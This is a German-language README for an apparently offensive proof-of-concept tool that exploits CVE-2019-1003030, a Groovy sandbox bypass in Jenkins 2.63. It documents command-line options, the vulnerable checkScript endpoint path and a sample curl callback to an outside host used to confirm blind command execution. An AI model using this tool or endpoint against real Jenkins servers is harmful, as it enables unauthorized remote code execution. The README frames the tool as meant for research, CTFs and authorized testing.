
PoC für Jenkins 2.63 CVE-2019-1003030
Dieses Projekt automatisiert die Erstellung und Auslieferung von Groovy-Payloads an den Jenkins SecureGroovyScript-Validierungsendpunkt, der von Jenkins 2.63 verwendet wird. Das Tool unterstützt sowohl interaktive als auch einmalige Ausführung. Der Exploit gibt keine Ausgabe zurück, daher müssen Sie einige Validierungen durchführen, z.B. curl your AP, um sicherzustellen, dass es funktioniert.
Das Tool unterstützt beides:
Haftungsausschluss
Dieses Projekt ist ausschließlich für Sicherheitsforschung, CTFs, Laborumgebungen und autorisierte Penetrationstests gedacht. Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.
usage: Poc.py -u http://10.10.10.10:8080/ [-c 'curl http://10.10.10.9/callback'] [-X POST] [-p /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript]
PoC for sandbox bypass for jenkins 2.63
options:
-h, --help show this help message and exit
-u, --url URL ip of target
-X, --method METHOD post or get
-b, --breadcrum BREADCRUM
optional jenkins crumb string
-c, --command COMMAND
command to run on jenkins, not output expected
-p, --path PATH path to the script, you might prepend more
Lassen Sie die -c Option weg, um einen interaktiven Prompt zu starten. Das folgende Beispiel zeigt leider keine Ausgabe, aber solange Sie keine 404 erhalten, sollte es funktionieren.
